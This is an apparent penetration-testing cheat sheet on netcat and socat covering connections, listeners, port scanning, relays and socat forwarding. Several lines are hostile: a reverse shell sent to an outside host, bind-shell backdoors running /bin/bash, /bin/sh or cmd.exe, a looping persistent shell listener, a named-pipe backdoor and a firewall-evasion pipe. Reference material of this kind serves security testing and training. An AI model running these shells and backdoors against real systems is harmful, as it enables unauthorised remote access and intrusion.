Netcat & Socat

Search…
Netcat & Socat
Netcat rocks my socks
Netcat
Basics
Connect to a socket on host 192.168.1.1 on TCP port 81
1
nc 192.168.1.1 81
Copied!
Listen on the local machine for inbound TCP connections on port 81
1
nc -nvlp 81
Copied!
Reverse shell sent to host 10.0.0.2 over TCP port 53
1
nc 10.0.0.2 53 -e /bin/bash
Copied!
Backdoor listening on TCP 80 set to execute cmd.exe when connected
1
nc -nvlp 80 -e cmd.exe
Copied!
More Fancy
Attempt to connect to each port from 10-90 on 10.0.0.1, don't resolve any names -n, don't send any data -z, and only wait 1 second for a connection -w1
1
nc -nvzw1 10.0.0.1 10-90
Copied!
Netcat stops listening after the connection drops or is terminated, which can make getting another shell back annoying. Placing nc in a bash true loop is an easy way to work around this, use nohup also!
1
while [ 1 ]; do echo “started”; nc -l -p 1234 -e /bin/sh; done
Copied!
Netcat relay used to forward everything received by the host on TCP 4321 sent to 10.0.0.1 on TCP 8123
1
nc -l -p 4321 | nc 10.0.0.1 8123
Copied!
Create a netcat backdoor without -e support. This generates a named pipe which is used to funnel data between bash and nc. 
1
mknod backpipe p
2
/bin/bash 0<backpipe | nc -l -p 8080 1>backpipe
Copied!
Firewall Evasion
If a specific port is blocked at the firewall, netcat can be used to pipe through authorized ports. Using the named pipe we can pipe the data thru to the nc output
1
mknod mypipe p
2
nc -lp 80 < mypipe | nc 127.0.0.1 22 > mypipe
3
ssh [email protected] -p 80    # Attcker command to connect to ssh piped thru port 80
Copied!
Socat
socat is a program which can be used for enhanced netcat usage. Supports SSL and forking
1
# Below command listens locally on 8080, forwards connections to 10.0.0.1:80
2
socat -v tcp4-listen:8080,reuseaddr,fork TCP4:10.0.0.1:80
3
​
4
# Listen with SSL and send to std out
5
socat openssl-listen:8443,reuseaddr,cert=ssl.pem,verify=0,fork stdio
Copied!
​
Last modified 1mo ago
Copy link
Contents